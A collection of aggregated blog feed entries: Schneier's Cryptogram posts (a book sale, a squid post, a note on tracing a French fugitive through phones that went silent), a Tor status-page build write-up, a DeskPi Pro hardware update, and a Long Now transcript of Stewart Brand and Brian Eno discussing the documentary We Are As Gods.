Cryptogram Second Click Here to Kill Everybody Sale

For a limited time, I am selling signed copies of Click Here to Kill Everybody in hardcover for just $6, plus shipping.

I have 600 copies of the book available. When they’re gone, the sale is over and the price will revert to normal.

Order here.

Please be patient on delivery. It’s a lot of work to sign and mail hundreds of books. I try to do some each day, but sometimes I can’t. And the pandemic can cause mail slowdowns all over the world.

Cryptogram Friday Squid Blogging: On Squid Coloration

Nice excerpt from Martin Wallin’s book Squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Identifying People Through Lack of Cell Phone Use

In this entertaining story of French serial criminal Rédoine Faïd and his jailbreaking ways, there’s this bit about cell phone surveillance:

After Faïd’s helicopter breakout, 3,000 police officers took part in the manhunt. According to the 2019 documentary La Traque de Rédoine Faïd, detective units scoured records of cell phones used during his escape, isolating a handful of numbers active at the time that went silent shortly thereafter.

Planet DebianAntoine Beaupré: Building a status page service with Hugo

The Tor Project now has a status page which shows the state of our major services.

You can check for news about major outages in Tor services, including v3 and v2 onion services, directory authorities, our website, and the tool. The status page also displays outages related to Tor internal services, like our GitLab instance.

This post documents why we launched, how the service was built, and how it works.

Why a status page

The first step in setting up a status page was to realize we needed one in the first place. I surveyed internal users at the end of 2020 to see what could be improved, and one of the suggestions that came up was to "document downtimes of one hour or longer" and generally improve communications around monitoring. The latter is still on the sysadmin roadmap, but a status page seemed like a good solution for the former.

We already have two monitoring tools in the sysadmin team: Icinga (a fork of Nagios) and Prometheus, with Grafana dashboards. But those are hard to understand for users. Worse, they also tend to generate false positives, and don't clearly show users which issues are critical.

In the end, a manually curated dashboard provides important usability benefits over an automated system, and all major organisations have one.

Picking the right tool

It wasn't my first foray in status page design. In another life, I had setup a status page using a tool called Cachet. That was already a great improvement over the previous solutions, which were to use first a wiki and then a blog to post updates. But Cachet is a complex Laravel app, which also requires a web browser to update. It generally requires more maintenance than what we'd like, needing silly things like a SQL database and PHP web server.

So when I found cstate, I was pretty excited. It's basically a theme for the Hugo static site generator, which means that it's a set of HTML, CSS, and a sprinkle of Javascript. And being based on Hugo means that the site is generated from a set of Markdown files and the result is just plain HTML that can be hosted on any web server on the planet.


At first, I wanted to deploy the site through GitLab CI, but at that time we didn't have GitLab pages set up. Even though we do have GitLab pages set up now, it's not (yet) integrated with our mirroring infrastructure. So, for now, the source is hosted and built in our legacy git and Jenkins services.

It is nice to have the content hosted in a git repository: sysadmins can just edit Markdown in the git repository and push to deploy changes, no web browser required. And it's trivial to setup a local environment to preview changes:

hugo serve --baseUrl=http://localhost/
firefox http://localhost:1313/

Only the sysadmin team and gitolite administrators have access to the repository, at this stage, but that could be improved if necessary. Merge requests can also be issued on the GitLab repository and then pushed by authorized personnel later on, naturally.


One of the concerns I have is that the site is hosted inside our normal mirror infrastructure. Naturally, if an outage occurs there, the site goes down. But I figured it's a bridge we'll cross when we get there. Because it's so easy to build the site from scratch, it's actually trivial to host a copy of the site on any GitLab server, thanks to the .gitlab-ci.yml file shipped (but not currently used) in the repository. If push comes to shove, we can just publish the site elsewhere and point DNS there.

And, of course, if DNS fails us, then we're in trouble, but that's the situation anyway: we can always register a new domain name for the status page when we need to. It doesn't seem like a priority at the moment.

Comments and feedback are welcome!

This article was first published on the Tor Project Blog.

Planet DebianJonathan McDowell: DeskPi Pro update

I wrote previously about my DeskPi Pro + 8GB Pi 4 setup. My main complaint at the time was the fact one of the forward facing USB ports broke off early on in my testing. For day to day use that hasn’t been a problem, but it did mar the whole experience. Last week I received an unexpected email telling me “The new updated PCB Board for your DeskPi order was shipped.”. Apparently this was due to problems with identifying SSDs and WiFi/HDMI issues. I wasn’t quite sure how much of the internals they’d be replacing, so I was pleasantly surprised when it turned out to be most of them; including the PCB with the broken USB port on my device.

DeskPi Pro replacement PCB

They also provided a set of feet allowing for vertical mounting of the device, which was a nice touch.

The USB/SATA bridge chip in use has changed; the original was:

usb 2-1: New USB device found, idVendor=152d, idProduct=0562, bcdDevice= 1.09
usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
usb 2-1: Product: RPi_SSD
usb 2-1: Manufacturer: 52Pi
usb 2-1: SerialNumber: DD5641988389F

and the new one is:

usb 2-1: New USB device found, idVendor=174c, idProduct=1153, bcdDevice= 0.01
usb 2-1: New USB device strings: Mfr=2, Product=3, SerialNumber=1
usb 2-1: Product: AS2115
usb 2-1: Manufacturer: ASMedia
usb 2-1: SerialNumber: 00000000000000000000

That’s a move from a JMicron 6Gb/s bridge to an ASMedia 3Gb/s bridge. It seems there are compatibility issues with the JMicron that mean the downgrade is the preferred choice. I haven’t retried the original SSD I wanted to use (that wasn’t detected), but I did wonder if this might have resolved that issue too.

Replacing the PCB was easier than the original install; everything was provided pre-assembled and I just had to unscrew the Pi4 and slot it out, then screw it into the new PCB assembly. Everything booted fine without the need for any configuration tweaks. Nice and dull. I’ve tried plugging things into the new USB ports and they seem ok so far as well.

However I also then ended up pulling in a new backports kernel from Debian (upgrading from 5.9 to 5.10) which resulted in a failure to boot. The kernel and initramfs were loaded fine, but no login prompt ever appeared. Some digging led to the discovery that a change in boot ordering meant USB was not being enabled. The solution is to add reset_raspberrypi to the /etc/initramfs-tools/modules file - that way this module is available in the initramfs, the appropriate pre-USB reset can happen and everything works just fine again.
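Concretely (a generic Debian recipe rather than something quoted from the post), that means appending the module name and rebuilding the initramfs:

```shell
# add the module to the initramfs module list...
echo reset_raspberrypi | sudo tee -a /etc/initramfs-tools/modules
# ...and regenerate the initramfs so it takes effect on the next boot
sudo update-initramfs -u
```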

The other niggle with the new kernel was a regular set of errors in the kernel log:

mmc1: Timeout waiting for hardware cmd interrupt.
mmc1: sdhci: ============ SDHCI REGISTER DUMP ===========

and a set of registers afterwards, roughly every 10s or so. This seems to be fallout from an increase in the core clock now that the VC4 driver is enabled, combined with the fact I have no SD card in the device and the lack of a working card-detect line for the MicroSD slot. There’s a GitHub issue, but I solved it by removing the sdhci_iproc module for now - I’m not using the WiFi, so loss of MMC isn’t a problem.
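The post doesn’t say how the module was removed; one common way to do it (an assumption on my part, not necessarily what was done here) is a modprobe blacklist entry. Again this sketch writes to a temporary file so it’s harmless to run; the real target would be a file under /etc/modprobe.d/:

```shell
# Blacklist sdhci_iproc so the failing MMC probe (and its register dumps)
# stops. Real target: /etc/modprobe.d/blacklist-sdhci-iproc.conf (as root),
# followed by `update-initramfs -u` if the module gets loaded from the
# initramfs. CONF is a temp stand-in for that file.
CONF=$(mktemp)
echo 'blacklist sdhci_iproc' >> "$CONF"
cat "$CONF"
```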

Credit to DeskPi for how they handled this. I didn’t have to do anything and didn’t even realise anything was happening until I got the email with my tracking number and a description of what was being sent out. Delivery took less than a week. This is a great example of how to handle a product issue - no effort required on the part of the customer.

LongNowStewart Brand and Brian Eno on “We Are As Gods”

In March 02021, We Are As Gods, the documentary about Long Now co-founder Stewart Brand, premiered at SXSW. As part of the premiere, the documentary’s directors, David Alvarado and Jason Sussberg, hosted a conversation between Brand and fellow Long Now co-founder Brian Eno. (Eno scored the film, contributing 24 original tracks to the soundtrack.) The full conversation can be watched above. A transcript follows below.  

David Alvarado: Hi. My name is David Alvarado. I’m one of the directors for a new documentary film called We Are as Gods. This is a documentary feature that explores the extraordinary life of a radical thinker, environmentalist, and controversial technologist, Stewart Brand. This is a story that marries psychedelia, counterculture, futurism. It’s an unexpected journey of a complicated American polymath at the vanguard of our culture.

Today, we’re having a conversation with the subject of the film himself, Stewart Brand, and Brian Eno.

Jason Sussberg: Okay. In the unlikely event that you don’t know either of our two speakers, allow me to introduce them. First off, we have Brian Eno, who’s a musician, a producer, a visual artist and an activist. He is the founding member of the Long Now Foundation, along with Stewart Brand. He’s a musician of multiple albums, solo and collaborative. His latest album is called Film Music 1976-2020, which was released a few months ago, and we are lucky bastards because it includes a song from our film, We Are as Gods, called “A Reasonable Question.”

Stewart Brand, he is the subject of our documentary. Somewhere, long ago, I read a description of Stewart saying that he was “a finder and a founder,” which I think is a really apt way to talk about him. He finds tools, people, and ideas, and blends them together. He founded or co-founded Revive and Restore, The Long Now Foundation, The WELL, Global Business Network, and the Whole Earth Catalog and all of its offshoots. He is an author of multiple books, and he’s currently working on a new book called Maintenance. He’s a trained ecologist at Stanford and served as an infantry officer in the Army. I will let Stewart and Brian take it from here.

Stewart Brand: Brian, what a pleasure to be talking to you. I just love this.

Brian Eno: Yes.

Stewart Brand: You and I go back a long way. I was a fan before I was a friend, and so I continue to be a fan. I’m a fan of the music that you added to this film. I’m curious about particularly the one that is in your new album, Film Music. What’s it called…”[A] Reasonable Question.” Tell me what you remember about that piece, and I want to ask the makers of the film here what it was like from their end.

Jason Sussberg: We can play it for our audience now.

David Alvarado: You originally titled it “Why Does Music Like This Exist?”

Brian Eno: The reason it had that original title, “Why Does Music Like This Even Exist?”, was because it was one of those nights when I was in a mood of complete desperation, and thinking, “What am I doing? Is it of any use whatsoever?” I’ve learned to completely distrust my moods when I’m working on music. I could think something is fantastic, and then realize a few months later that it’s terrible, and vice versa. So what I do is I routinely mix everything that I ever work on, because I just don’t trust my judgment at the moment of working on it. That piece, the desperation I felt about it is reflected in the original title, “Why Does Music Like This Even Exist?” I was thinking, “God, this is so uninteresting. I’ve done this kind of thing a thousand times before.”

In fact, it was only when we started looking for pieces for this film…the way I look for things is just by putting my archive on random shuffle, and then doing the cleaning or washing up or tidying up books or things like that. So I just hear pieces appear. I often don’t remember them at first. I don’t remember when I did them. Anyway, this piece came up. I thought, “Oh. That’s quite a good piece.”

David Alvarado: I mean, that’s so brilliant because it’s actually… We weren’t involved, obviously, in choosing what music tracks you wanted to use for your 1976 to 2020 film album, and so you chose that one, the very one that you weren’t liking at the beginning. That’s just incredible.

Brian Eno: Yes. Well, this has happened now so many times that I think one’s judgment at the time of working has very little to do with the quality of what you’re making. It’s just to do with your mood at that moment.

Stewart Brand: So in this case, Brian, that piece is kind of joyous and exciting to hear. These guys put it in a part of the film where I’m at my best, I’m actually part of a real frontier happening. This must be a first for you, in a sense, you’re not only scoring the film, you’re in the film. This piece of film, I now realize as we listened to it, then cuts into you talking about me, but not about the music. You had no idea when they were interviewing you it was going to be overlaid on this. I sort of have to applaud these guys for not getting cute there and drowning you out with your own music there or something. “Yeah, well, he is chatting on, but let’s listen to the music.” But nevertheless, it really works in there. Do you like how it worked out in the film?

Brian Eno: Yes. Yes, I do. I like that, and quite a few of the other pieces appeared probably in places that I wouldn’t have imagined putting them, actually. This, I think, is one of the exciting things about doing film music, that you hear the music differently when you see it placed in a context. Just like music can modify a film, the film can modify the music as well. So sometimes you see the music and you think, “Oh, yes. They’ve spotted a feeling in that that I didn’t, or I hadn’t articulated anyway, I wasn’t aware of, perhaps.”

Stewart Brand: You’ve done a lot of, and the album shows it, you’ve done a lot of music for film. Are there sort of rules in your mind of how you do that? It’s different than ambient music, I guess, but there must be sort of criteria of, “Oh yeah, this is for a film, therefore X.” Are there things that you don’t do in film music?

Brian Eno: Yes. I’ll tell you what the relationship is with ambient music. Both ambient music and most of the film music I make deliberately leaves a space where somebody else might fill that space in with a lead instrument or something that is telling a story, something narrative, if you like. Even if it’s instrumental, it can still be narrative in the sense that you get the idea that this thing is the central element, which is having the adventure, and the rest is a sort of support structure to that or a landscape for that.

So what I realized, one of the things I liked about film music was that you very often just got landscape, which wasn’t populated, because the film is meant to be the thing that populates the landscape, if you like. I started listening to film music probably in the late ’60s, and it was Italian, like Nino Rota and Ennio Morricone and those kinds of people, who were writing very, very atmospheric music, which sort of lacked a central presence. I like that hole that was left, because I found the hole very inviting. It kind of says, “Come on, you be the adventurer. You, the listener, you’re in this landscape, what’s happening to you?” It’s a deliberate incompleteness, in a way, or an unfinishedness that that music has. I think that was part of the idea of ambient music as well, to try to make something that didn’t try to fix your attention, to hold it and keep it in one place, that deliberately allowed it to wander around and have a look around. So this happens to be a good formula for film music.

I really started making film music in a strange way. I used to, when I was working on my early song albums, sometimes at the end of the day I’d have half an hour left and I’d have a track up on a multi-track tape, with all the different instruments, and I’d say to the engineer, “Let’s make the film music version now.” And what that normally meant was take out the main instruments, the voice, particularly the voice, and then other things that were sort of leading the piece. Take those all out, slow the tape down, often, to half speed, and see what we can do with what’s left. Actually, I often found those parts of the day more exciting than the rest of the day, when suddenly something came into existence that nobody had ever thought about before. That was sort of how I started making film music.

So I had collected up a lot of pieces like that, and I thought, “Do you know what, I should send these to film directors. They might find a use for these.” And indeed they did. So that’s how it started, really.

Stewart Brand: So you initiated that, the filmmakers did not come to you.

Brian Eno: No. I had been approached only once before. Actually, before I ever made any albums I’d been approached by a filmmaker to do a piece of music for him, but other than that, no, I didn’t have any approaches. I sort of got the ball rolling by saying, “Look, I’m doing this kind of music, and I think it would be good for films.” So I released an album which was called Music for Films, though in fact none of the music had been in films. It was a sort of proposal: this is music that could be in films. I just left out the could be.

Stewart Brand: You are a very good marketer of your product, I must say. That’s just neat. So from graphic designers, the idea of figure-ground, and sometimes they flip and things like that, that’s all very interesting. It sounds like in a way this is music which is all ground, but invites a figure.

Brian Eno: Yes, yes.

Stewart Brand: You’re a graphic artist originally, is that right?

Brian Eno: Well, I was trained as a fine artist, actually. I was trained as a painter. Well, when I say I was trained, I went to an art school which claimed it was teaching a fine art course, so I did painting and sculpture. But actually I did as much music there as I did visual art as well.

Stewart Brand: So it’s an art school, and you were doing music. Were other people in that school doing music at that time, or is that unique to you?

Brian Eno: No, that was in the ’60s. The art schools were the crucible of a lot of what happened in pop music at that time. And funnily enough, also the art schools were where experimental composers would find an audience. The music schools were absolutely uninterested in them. Music schools were very, very academic at that time. People had just started, I was one of the pioneers of this, I suppose, had just started making music in studios. So instead of sitting down with a guitar and writing something and then going into the studio to record it, people like me were going into studios to make something using the possibilities of that place, something that you couldn’t have made otherwise. You wouldn’t come up with a guitar or a piano. A sort of whole new era of music came out of that, really. But it really came out of this possibility of multi-track recording.

Stewart Brand: So this is pre-digital? You’re basically working with the tapes and mixing tapes, or what?

Brian Eno: This was late ’60s, early ’70s. What had happened was that until about 01968, the maximum number of tracks you had was four tracks. I think people went four-track in 01968. I think the last Beatles album was done on four track, which was considered incredibly luxurious. What that meant, four tracks, was that you could do something on one track, something on another, mix them down to one track so you still got one track and then three others left, then you could kind of build things up slowly and carefully.

Over time, so, it meant something different musically, because it separated music from performance. It made music much more like painting, in that you could add something one day and take it off the next day, add something else. The act of making music extended in time like the act of painting does. You didn’t have to just walk in front of the canvas and do it all in one go, which was how music had previously been recorded. That meant that recording studios were something that painting students immediately understood, because they understood that process. But music students didn’t. They still thought it had to be about performance. In fact, there was a lot of resistance from musicians in general, because they thought that it was cheating, it wasn’t fair you were doing these things. You couldn’t actually play them. Of course, I thought, “Well, who cares? It doesn’t really matter, does it? What matters is what comes out at the end.”

Stewart Brand: Well, I was doing a little bit of music, well, sort of background stuff or putting together things for art installations at that time, and what I well remember is fucking razor blade, where you’re cutting the tape and splicing it, doing all these things. It was pretty raw. But of course, the film guys are going through the same stuff at that time. They were with their razor blade equivalents, cutting and splicing and whatnotting. So digital has just exploded the range of possibilities, which I think I’ve heard some of your theory that exploded them too far, and you’re always looking for ways to restrain your possibilities when you’re composing. Is that right?

Brian Eno: Yes. Well, I suppose it’s a problem that everybody has now, when you think about it. Now, we’re all faced with a whole universe of rabbit holes that we could spend our time disappearing down. So you have to permanently be a curator, don’t you think? You have to be always thinking, “Okay. There’s a million interesting things out there, but I’d like to get something done, so how am I going to reduce that variety and choose a path to follow?”

Stewart Brand: How much of that process is intention and how much is discovery?

Brian Eno: I think the thing that decides that is whether you’ve got a deadline or not. The most important element in my working life, a lot of the time, is a deadline. The reason it’s important… Well, I’m sure as a writer you probably appreciate deadlines as well. It makes you realize you’ve got to stop pissing around. You have to finally decide on something. So the archive of music that I have now, which is to say after those days of fiddling around like I’ve described with that piece, I’d make a rough mix, they go into the archive — I’ve got 6,790 pieces in the archive now, I noticed today. They’re nearly all unfinished. They’re sort of provocative beginnings. They’re interesting openings. When I get a job like the job of doing this film music, I think, “Okay. I need some music.” So I naturally go to the archive and see what I’ve already started which might be possible to finish as the piece for this film, for example.

So whether I finish something or not completely depends really on whether it has a destination and a deadline. If it’s got a destination, that really helps, because I think, “Okay. It’s not going to be something like that. It’s not going to be that.” It just clears a lot of those possibilities which are amplifying every day. They’re multiplying every day, these possibilities. 

Stewart Brand: One thing that surprised me about your work on this film, is I thought you would have just handed them a handful of cool things and they would then turn it into the right background at the right place from their standpoint. But it sounds like there was interaction, Jason and David, between you and Brian on some of these cuts. What do you want to say about that?

Jason Sussberg: Yeah. I mean, we had an amazing selection of great tracks to plug in and see if they could help amplify the scene visually by giving it a sonic landscape that we could work with. Then, our initial thinking was that’s how we were going to work. But then we ended up going back to you, Brian, and asking for perhaps a different track or a different tone. And then you ended up, actually, making entirely new original music, to our great delight. So one day when we woke up and we had in our inbox original music that you scored specifically for scenes, that was a great delight. We were able to have a back and forth.

Brian Eno: Yes, that’s-

Stewart Brand: Were you giving him visual scenes or just descriptions?

Jason Sussberg: Right. Actually, what we did was we pulled together descriptions of the scenes and then we had… You just wanted, Brian, just a handful of photographs to kind of grok what we were doing. I don’t think you… Maybe you could talk about why you didn’t want the actual scene, but you had a handful of stills and a description of what we were going for tonally, and then you took it from there. What we got back was both surprising and made perfect sense every time.

Brian Eno: I remember one piece in particular that I made in relation to a description and some photographs, which was called, when I made it, it was called “Brand Ostinato.” I don’t know what it became. You’d have to look up your notes to see what title it finally took. But that piece, I was very pleased with. I wanted something that was really dynamic and fresh and bracing, made you sort of stand up. So I was pleased with that one.

But I usually don’t want to see too much of the film, because one of the things I think that music can do is to not just enhance what is already there in the film, which is what most American soundtrack writing is about… Most Hollywood writing is about underlining, about saying, “Oh, this is a sad scene. We’ll make it a little sadder with some music.” Or, “This is an action scene. We’ll give it a little bit more action.” As if the audience is a bit stupid and has to be told, “This is a sad scene. You’re supposed to feel a bit weepy now.” Whereas I thought the other day, what I like better than underlining is undermining. I like this idea of making something that isn’t really quite in the film. It’s a flavor or a taste that you can point to, and people say, “Oh, yes. There’s something different going on there.”

I mean, it would be very easy with Stewart to make music that was kind of epic and, I don’t know, Western or American or Californian or something like that. There are some obvious things you could do. If you were that kind of composer, you’d carefully study Stewart and you’d find things that were Stewart-ish in music and make them. But I thought, “No. What is exciting about this is the shock of the new kind of feeling.” That piece, that particular piece, “Brand Ostinato,” has that feeling, I think, of something that is very strikingly upright and disciplined. This discipline, that’s I think the feeling of it that I like. I don’t think, in that particular part in the film, where that occurs, I don’t think that’s a scene where you would see discipline, unless somebody had suggested it to you by way of a piece of music, for example.

Stewart Brand: And Jason, did you in fact use that piece of music with that part of the film?

Jason Sussberg: Yeah, I don’t think it was exactly where Brian had intended to put it, but hearing the description, what we did was we put that song in a scene where you are going to George Church’s lab, Stewart, and we’re trying to build up George Church as this genius geneticist. So the song was actually, curiously, written about Stewart and Stewart’s character of discipline, but we apply it to another character in the film. However, what you were going for, which is this upright, adventurous, Western spirit, I think is embodied by the work of the Church Lab to de-extinct animals. So it has that same bravado and gusto that you intended, it was just we kind of… And maybe this is what you were referring to about undermining and underlining, I feel like we kind of undermined your original intention and applied it to a different character, and that dialectic was working. Of course, Stewart is in that scene, but I think that song, that track really amplifies the mood that we were going for, which is the end of the first act.

Brian Eno: Usually, when people do music that is about cutting edge science, it’s all very drifty and cosmic. It’s all kind of, “Wow, it’s so weird,” kind of thing. I really wanted to say science is about discipline, actually. It’s about doing things well and doing things right. It’s not hippie-trippy. Of course, you can feel that way about it once it’s done, but I don’t think you do it that way. So I didn’t want to go the trippy route.

David Alvarado: Yeah. We loved it. It still is the anthem of the film for us. I mean, you named it as such, but it just really feels like it embodies Stewart’s quest on all his amazing adventures he’s been on. So that’s fantastic.

Brian Eno: One of the things that is actually really touching about this film is the early life stuff, which of course I never knew anything about. As women always say, “Well, men never ask that sort of question, do they?” And in fact, in my case it’s completely true. I never bothered to ask people how they got going or that kind of autobiographical question. But what strikes me, first of all, your father was quite an important part of the story. I got the feeling that quite a lot of the character that is described in there is attributed to your father has come right through to you as well, this respect for tools and for making things, which is different from the intellectual respect for thinking about things. Often intellectuals respect other thinkers, but they don’t often respect makers in the same way. So, I wonder when you started to become aware that there could be an overlap between those two things, that there was a you that was a making you and there was a thinking you as well? I wonder if there was a point where those two sort of came together for you, in your early life.

Stewart Brand: Well, you’re pointing out something that I hadn’t really noticed as well, frankly, until the film, which is what I remember is that my father was sort of ground and my mother was figure. She was the big event. She got me completely buried in books and thinking, and she was a liberal. I never did learn what my father’s politics were, but they’re probably pretty conservative. He tried to teach me to fish and he was a really desperately awful teacher. He once taught a class of potential MIT students and failed every one of them. My older brother Mike said, “Why did you do that?” And he said, “Well, they just did not learn the material. They didn’t make it.” And my brother actually said, “You don’t think that says anything about you as their teacher?”

So I kind of discounted —  as I’m making youthful, stupid judgments — him. I think what you pointed out is a very good one. He was trained as a civil engineer at MIT. Another older brother, Pete, went to MIT. I later completely got embedded at MIT at The Media Lab and Negroponte and all of that. In a way I feel more identified with MIT than I do with Stanford where I did graduate. In Stanford I took as many humanities as I could with a science major.

But I think it’s also something that happened with the ’60s, Brian, which is that what we were dropping out of — late beatniks, early hippies, which is my generation — was a construct that universities were imparting, and I imagine British universities have a slightly different version of this than American ones, but still, the Ivy League-type ones. I remember one of the eventual sayings of the hippies was “back to basics,” which we translated as “back to the land,” which turned out to be a mistake, but the back to basics part was pretty good. We had this idea, we were immediately followed by the baby boom. It was the bulge in the snake, the pig in the python. There were so many of us that the world was always asking us our opinion of things, which we wind up taking for granted. You could, as a young person, you could just call a press conference. “I’m a young person. I want to expound some ideas.” And they would show up and write it all seriously down. The Beatles ran into this. It was just hysterical. Pretty soon you start having opinions. 

We were getting Volkswagen Bugs and vans. This is in my mind now because I’m working on this book about maintenance. We were learning how to fix our own cars. Partly it was the either having no money or pretending to have no money, which, by the way, that was me. It turned out I actually had a fair amount, I just ignored it, that my parents had invested in my name. We were eating out of and exploring and finding amazing things basically in garbage cans and debris boxes. Learning how to cook and eat roadkill and make clothing and domes and all these things. This was something that Peter Drucker noticed about that generation, that they were the first set of creatives that took not just art but also in a sense craft and just stuff seriously, and learned… Mostly we were making mistakes with the stuff, but then you either just backed away from it or you learned how to do it decently after all and become a great guitar maker or whatever it might be. That was what the Whole Earth Catalog tapped into, was that desire to not just make your own life, but make your own world.

Brian Eno: I’m trying to think… In my own life, I can remember some games I played as kids that I made up myself. I realized that they were really the first creative things that I ever did. I invented these games. I won’t bother to explain them, they were pretty simple, but I can remember the excitement of having thought of it myself, and thinking, “I made this. I made this idea myself.” I was sort of intrigued by it. I just wondered if there was a moment in your life when you had that feeling of, “This is the pleasure of thinking, the pleasure of coming up with something that didn’t exist before”?

Stewart Brand: There was one and it’s very well expressed in the film, which was the Trips Festival in January 01966. That was the first time that I took charge over something. I’d been going along with Ken Kesey and the Pranksters. I’d been going along with various creative people, USCO, a group of artists on the East Coast, and contributing but not leading. Once I heard from one of the Pranksters, Mike Hagen, that they wanted to do a thing that would be a Trips Festival, kind of an acid test for the whole Bay Area. I knew that they could not pull that off, but that it should happen. I picked up the phone and I started making arrangements for this public event.

And it worked out great. We were lucky in all the ways that you can be lucky in, and not unlucky in any of the ways you can be unlucky. It was a coup. It was something of a tour de force, not by me, but by basically the Bay Area creatives getting together in one place and changing each other and the world. That was the point for me that I had really given myself agency to drive things.

There’s other things that give you reality in the world. Also in the film is when I appeared on the Dick Cavett Show.

Brian Eno: Oh, yes.

Stewart Brand: Which was a strange event for all of us. But the effect it had in my family was that… My father was dead by then, but my mother had always been sort of treating me as the youngest child, needing help. She would send money from time to time, keep me going in North Beach. But once I was on Dick Cavett, which she regularly watched, I had grown up in her eyes. I was now an adult. I should be treated as a peer.

Brian Eno: So no more money.

Stewart Brand: Well… yeah, yeah. Did that ever happen? I think she sort of liked occasionally keeping a token of dependency going. She was very generous with the money.

The great thing of being a hippie is you didn’t need much. I was not an expensive dependent. That was, I think, another thing there that the hippies weren’t, and that makes us freer about being wealthy or not, is that we’ve had perfectly good lives without much money at all. So the money is kind of an interesting new thing that you can get fucked up by or do creatively or just ignore. But you have those choices in a way, I think, that people who are either born to money or who are getting rich young don’t have. They have other interesting situations to deal with. For us, the discipline was not enough money, and for some of them the discipline is too much money, and how do you keep that from killing you.

Brian Eno: Yes. Yeah. I’ll ask the filmmakers a question as well, if I may. It’s a very simple question, but it isn’t actually answered in the film. The question is: why Stewart? Why did you choose to make a film about him? There are so many interesting people in North America, let alone in the West Coast, but what drew you to him in particular?

Jason Sussberg: I’ll answer this, and then I’ll let you take a swipe at this, David. I mean, I’ve always looked up to Stewart from the time that I ran into an old Whole Earth Catalog. It was the Last Whole Earth Catalog, when I was 18 years old, going to college in the year 02000. So this was 25 years after it was written. I sort of dove into it head first and realized this strange artifact from the past actually was a representation of possibilities, a representation of the future. So after that moment, I read a book of Stewart’s that just came out, about the Clock of the Long Now, and after that… I’ve always been an environmentalist and Earth consciousness and trying to think about how to preserve the natural world, but also I believe in technology as a hopeful future that we can have. We can use tools to create a more sustainable world. So Stewart was able to blend these two ideas in a way that seemed uncontroversial, and it really resonated with me as a fan of science and technology and the natural world. So Stewart, pretty much from an early age, was someone I always looked up to.

When David and I went to grad school, we were talking about the problems of the environmental movement, and Stewart was at the time writing a book that would basically later articulate these ideas.

Brian Eno: Oh, yes, good.

Jason Sussberg: And so when that book came out, it was like it just put our foot on the pedals, like, “Wow, we should make a movie of Stewart and his perspective.” But yeah, I was just always a fan of his.

Brian Eno: So that was quite a long time ago, then.

Jason Sussberg: Yeah, 10 years-

Brian Eno: Is that when you started thinking about it?

Jason Sussberg: Yeah, absolutely. I had made a short film of a friend of probably yours, Brian, and of Stewart’s, Lloyd Kahn. It was a short little eight-minute documentary about Lloyd Kahn and how he thought of shelter and of home construction. That was after that moment that I thought, “This is a really rich territory to explore.” I think that actually was 02008, so at that moment I already had the inkling of, wow, this would be a fantastic biographical documentary that nobody had made.

Stewart Brand: I’m curious, what’s David’s interest?

David Alvarado: Yeah, well, I think Jason and I are drawn to complicated stories, and my god, Stewart. There was a moment in college when I almost stopped becoming a filmmaker and wanted to become a geologist. I just was so fascinated by the complexity of looking at the land, being able to read the stratigraphy, for example, of a cliff and understand deep history of how that relates to what the land looks like now. So, I of course came back into film, but I see a lot of that there in your life. I mean, the layers of what you’ve done… The top layer for us is the de-extinction, the idea of resurrecting extinct species to reset ecosystems and repair damage that humans have caused. That could be its own subject, and if it’s all you did, that would be fascinating. But sitting right underneath that sits all these amazing things all the way back to the ’60s. So I think it’s just like my path as an artist to just dig through layers and, oh boy, your life was just full of it. It was a pleasure to be able to do that with you, so thank you for sharing your life with us.

Stewart Brand: Well, thank you for packaging my life for me. As Kevin Kelly says, the movie that you put out is sort of a trailer for the whole body of stuff that you’ve got. But by going through that process with you, and for example digitizing all of my tens of thousands of photographs, and then the interviews and the shooting in various places and having the adventure in Siberia and whatnot, but… When you get to the late 70s, Brian, and if you try to think of your life as an arc or a passage or story or a whole of any kind, it’s actually quite hard, because you’ve got these various telescopic views back to certain points, but they don’t link up. You don’t understand where you’ve been very well. It’s always a mishmash. With John Markoff also doing a book version of my life, it’s actually quite freeing for me to have that done. And Brian, this is where I wish Hermione Lee would do your biography. She would do you a great favor by just, “Here is everything you’ve done, and here is what it all means. My goodness, it’s quite interesting.” And then you don’t have to do that.

Brian Eno: Yeah, I’d be so grateful if she would do that, or if anybody would do that, yes.

Stewart Brand: It’s a real gift in that it’s also a really well done work of art. It has been just delightful for me. I think one of the things, Brian, it’ll be interesting to see which you see in this when you see the film more than once, or maybe you’ve already done so, is you’ve made a great expense of your time and effort, a re-watchable film. And Brian, the music is a big part of this. The music is blended in so much in a landscapy way, that except for a couple of places where it comes to the fore, like when I’m out in the canoe on Higgins Lake and you’re singing away, that it takes a re-listen, a re-viewing of the film to really start to get what the music is doing.

And then, you guys had such a wealth of material, both of my father’s amazing filmmaking and then from the wealth of photography I did, and then the wealth of stuff you found as archivists, I mean, the number of cuts in this film must be some kind of a record for a documentary, the number of images that go blasting by. So, instead of a gallery of photographs, it’s basically a gallery of contact sheets where you’re not looking at the shot I made of so-and-so, you’ve got all 10 of them, but sort of blinked together. That rewards re-viewing, because there’s a lot of stuff where things go by and you go, “Wait, what was that? Oh, no, there’s a new thing. Oh, what was that one? That one’s gone too.” They’re adding up. It’s a nice accumulative kind of drenching of the viewer in things that really rewards…

It’s one of the reasons that I think it’s actually going to do well on people’s video screenings, because they can stop it and go, “Wait a minute. What just happened?” And go back a couple of frames. Whereas in the theater, this is going to go blasting on by. Anyway, that’s my view, that this has been enjoyable to revisit.

Brian Eno: When you first watched… Well, I don’t know at which stage you first started watching what David and Jason had been doing, but were there any kind of nasty surprises, any places where you thought, “Oh god, I wish they hadn’t found that bit of film”?

David Alvarado: That’s a great question. Yeah.

Stewart Brand: Brian, the deal I sort of made with myself and with these guys, and that I made the same one with [John] Markoff, is it’s really their product. I’m delighted to be the raw material, but I won’t make any judgments about their judgments. When I think something is wrong, a photograph that depicts somebody that turns out not to be actually that person, I would speak up and I did do that. I’ve done much more of that sort of thing with Markoff in the book. But whenever there’s interpretation, that’s not my job. I have to flip into it, and it’s easy to be, when you both care about your life and you don’t care about your life, you would have this attitude too, of Brian Eno, yawn, been there done that, got sent a fucking T-shirt. So finding a way to not be bored about one’s life is actually kind of interesting, and that’s seeing through this refraction in a funhouse mirror, in a kaleidoscope of other people’s read, that makes it actually sort of enjoyable to engage.

